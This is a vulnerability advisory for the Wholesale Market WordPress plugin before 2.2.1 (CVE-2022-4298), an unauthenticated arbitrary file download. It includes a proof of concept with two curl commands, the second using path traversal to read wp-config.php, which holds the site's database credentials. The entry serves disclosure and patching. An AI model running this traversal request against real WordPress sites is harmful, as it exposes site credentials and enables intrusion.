WordPress Plugin Vulnerabilities

Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download

Description

The plugin does not have authorisation check, as well as does not validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server.

Proof of Concept

1. Install woocommerce (dependency, no setup required)
2. Install the vulnerable plugin (wholesale-market)
3. Invoke the following curl command to ensure the required uploads directory exists:
   (This creates /var/www/html/wp-content/uploads/wholesale_market_import_error/)

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv'

4. Invoke the following curl command to disclose the contents of the wp-config.php file:

curl -i 'https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php'

Affects Plugins

Plugin icon
wholesale-market
Fixed in 2.2.1

References

CVE
CVE-2022-4298

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
8.6 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
7485ad23-6ea4-4018-88b1-174312a0a478

Timeline

Publicly Published
2022-12-12 (about 1 years ago)
Added
2022-12-12 (about 1 years ago)
Last Updated
2022-12-12 (about 1 years ago)

Other

Published
Title
Published
2022-04-12
Title
WPvivid Backup and Migration Plugin < 0.9.71 - Admin+ Arbitrary File Download
Published
2021-02-13
Title
Theme Editor < 2.6 - Authenticated Arbitrary File Download
Published
2023-09-25
Title
NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete
Published
2022-11-28
Title
Wholesale Market for WooCommerce < 1.0.7 - Unauthenticated Arbitrary File Download
Published
2023-07-20
Title
Jupiter X Core <= 2.5.0 - Unauthenticated Arbitrary File Download